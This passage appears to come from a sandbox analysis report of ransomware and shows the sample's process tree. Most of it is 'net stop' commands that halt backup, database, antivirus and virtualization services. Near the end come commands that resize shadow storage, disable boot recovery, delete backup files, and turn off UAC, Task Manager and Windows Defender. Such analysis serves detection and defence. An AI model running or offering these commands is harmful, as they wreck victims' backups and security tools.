C:\Windows\system32\net.exenet stop "ReportServer"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SQL_2008"2⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$SQL_2008"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SQL_2008"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$SYSTEM_BGC"2⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$SYSTEM_BGC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPS"2⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$TPS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ReportServer$TPSAMA"2⤵
-
C:\Windows\system32\net.exenet stop "ReportServer$TPSAMA"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ReportServer$TPSAMA"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "RESvc"2⤵
-
C:\Windows\system32\net.exenet stop "RESvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "RESvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sacsvr"2⤵
-
C:\Windows\system32\net.exenet stop "sacsvr"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sacsvr"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SamSs"2⤵
-
C:\Windows\system32\net.exenet stop "SamSs"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVAdminService"2⤵
-
C:\Windows\system32\net.exenet stop "SAVAdminService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVAdminService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SAVService"2⤵
-
C:\Windows\system32\net.exenet stop "SAVService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SAVService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Smcinst"2⤵
-
C:\Windows\system32\net.exenet stop "Smcinst"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Smcinst"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SmcService"2⤵
-
C:\Windows\system32\net.exenet stop "SmcService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SmcService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SMTPSvc"2⤵
-
C:\Windows\system32\net.exenet stop "SMTPSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SMTPSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SNAC"2⤵
-
C:\Windows\system32\net.exenet stop "SNAC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SNAC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SntpService"2⤵
-
C:\Windows\system32\net.exenet stop "SntpService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SntpService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "sophossps"2⤵
-
C:\Windows\system32\net.exenet stop "sophossps"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "sophossps"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$BKUPEXEC"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$BKUPEXEC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$ECWDB2"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$ECWDB2"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$ECWDB2"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEBGC"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEBGC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEBGC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PRACTTICEMGT"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PRACTTICEMGT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PRACTTICEMGT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROFXENGAGEMENT"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROFXENGAGEMENT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROFXENGAGEMENT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SBSMONITORING"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SHAREPOINT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SHAREPOINT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQL_2008"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQL_2008"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SYSTEM_BGC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$TPSAMA"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$TPSAMA"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2012"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLBrowser"2⤵
-
C:\Windows\system32\net.exenet stop "SQLBrowser"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLBrowser"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"2⤵
-
C:\Windows\system32\net.exenet stop "SQLSafeOLRService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSafeOLRService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"2⤵
-
C:\Windows\system32\net.exenet stop "SQLSERVERAGENT"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLSERVERAGENT"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"2⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"2⤵
-
C:\Windows\system32\net.exenet stop "SQLTELEMETRY$ECWDB2"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLWriter"2⤵
-
C:\Windows\system32\net.exenet stop "SQLWriter"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLWriter"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SstpSvc"2⤵
-
C:\Windows\system32\net.exenet stop "SstpSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "svcGenericHost"2⤵
-
C:\Windows\system32\net.exenet stop "svcGenericHost"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "svcGenericHost"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "tmlisten"2⤵
-
C:\Windows\system32\net.exenet stop "tmlisten"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "tmlisten"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "TrueKey"2⤵
-
C:\Windows\system32\net.exenet stop "TrueKey"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "TrueKey"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "UI0Detect"2⤵
-
C:\Windows\system32\net.exenet stop "UI0Detect"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamBackupSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBackupSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamBrokerSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamBrokerSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCatalogSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamCatalogSvc"3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamCloudSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamCloudSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamCloudSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploymentService"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploymentService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploymentService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamDeploySvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamDeploySvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamDeploySvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamEnterpriseManagerSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamEnterpriseManagerSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamMountSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamMountSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamMountSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamNFSSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamNFSSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamNFSSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamRESTSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamRESTSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamRESTSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamTransportSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamTransportSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamTransportSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "W3Svc"2⤵
-
C:\Windows\system32\net.exenet stop "W3Svc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "W3Svc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"2⤵
-
C:\Windows\system32\net.exenet stop "wbengine"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WRSVC"2⤵
-
C:\Windows\system32\net.exenet stop "WRSVC"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WRSVC"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$VEEAMSQL2008R2"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$VEEAMSQL2008R2"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VeeamHvIntegrationSvc"2⤵
-
C:\Windows\system32\net.exenet stop "VeeamHvIntegrationSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VeeamHvIntegrationSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "swi_update"2⤵
-
C:\Windows\system32\net.exenet stop "swi_update"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "swi_update"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CXDB"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CXDB"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CXDB"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$CITRIX_METAFRAME"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$CITRIX_METAFRAME"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQL Backups"2⤵
-
C:\Windows\system32\net.exenet stop "SQL Backups"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQL Backups"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$PROD"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$PROD"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$PROD"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Zoolz 2 Service"2⤵
-
C:\Windows\system32\net.exenet stop "Zoolz 2 Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Zoolz 2 Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQLServerADHelper"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQLServerADHelper"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQLServerADHelper"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$PROD"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$PROD"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$PROD"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "msftesql$PROD"2⤵
-
C:\Windows\system32\net.exenet stop "msftesql$PROD"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "msftesql$PROD"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "NetMsmqActivator"2⤵
-
C:\Windows\system32\net.exenet stop "NetMsmqActivator"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "EhttpSrv"2⤵
-
C:\Windows\system32\net.exenet stop "EhttpSrv"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "EhttpSrv"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ekrn"2⤵
-
C:\Windows\system32\net.exenet stop "ekrn"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ekrn"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "ESHASRV"2⤵
-
C:\Windows\system32\net.exenet stop "ESHASRV"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "ESHASRV"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SOPHOS"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SOPHOS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SOPHOS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SOPHOS"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SOPHOS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SOPHOS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "AVP"2⤵
-
C:\Windows\system32\net.exenet stop "AVP"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "AVP"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "klnagent"2⤵
-
C:\Windows\system32\net.exenet stop "klnagent"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "klnagent"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "MSSQL$SQLEXPRESS"2⤵
-
C:\Windows\system32\net.exenet stop "MSSQL$SQLEXPRESS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQLEXPRESS"2⤵
-
C:\Windows\system32\net.exenet stop "SQLAgent$SQLEXPRESS"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "wbengine"2⤵
-
C:\Windows\system32\net.exenet stop "wbengine"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "HvHost"2⤵
-
C:\Windows\system32\net.exenet stop "HvHost"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "HvHost"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmickvpexchange"2⤵
-
C:\Windows\system32\net.exenet stop "vmickvpexchange"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmickvpexchange"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicguestinterface"2⤵
-
C:\Windows\system32\net.exenet stop "vmicguestinterface"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicguestinterface"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicshutdown"2⤵
-
C:\Windows\system32\net.exenet stop "vmicshutdown"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicshutdown"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicheartbeat"2⤵
-
C:\Windows\system32\net.exenet stop "vmicheartbeat"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicheartbeat"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmcompute"2⤵
-
C:\Windows\system32\net.exenet stop "vmcompute"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmcompute"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvmsession"2⤵
-
C:\Windows\system32\net.exenet stop "vmicvmsession"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvmsession"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicrdv"2⤵
-
C:\Windows\system32\net.exenet stop "vmicrdv"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicrdv"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmictimesync"2⤵
-
C:\Windows\system32\net.exenet stop "vmictimesync"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmictimesync"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "vmicvss"2⤵
-
C:\Windows\system32\net.exenet stop "vmicvss"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMAuthdService"2⤵
-
C:\Windows\system32\net.exenet stop "VMAuthdService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMAuthdService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMnetDHCP"2⤵
-
C:\Windows\system32\net.exenet stop "VMnetDHCP"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMnetDHCP"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMware NAT Service"2⤵
-
C:\Windows\system32\net.exenet stop "VMware NAT Service"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMware NAT Service"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMUSBArbService"2⤵
-
C:\Windows\system32\net.exenet stop "VMUSBArbService"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMUSBArbService"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "VMwareHostd"2⤵
-
C:\Windows\system32\net.exenet stop "VMwareHostd"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VMwareHostd"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Sense"2⤵
-
C:\Windows\system32\net.exenet stop "Sense"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Sense"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WdNisSvc"2⤵
-
C:\Windows\system32\net.exenet stop "WdNisSvc"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WdNisSvc"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "WinDefend"2⤵
-
C:\Windows\system32\net.exenet stop "WinDefend"3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"4⤵
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} recoveryenabled No2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del /s /f /q C:\*.bac C:\*.bak C:\*.bkf C:\Backup*.* C:\backup*.*2⤵
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
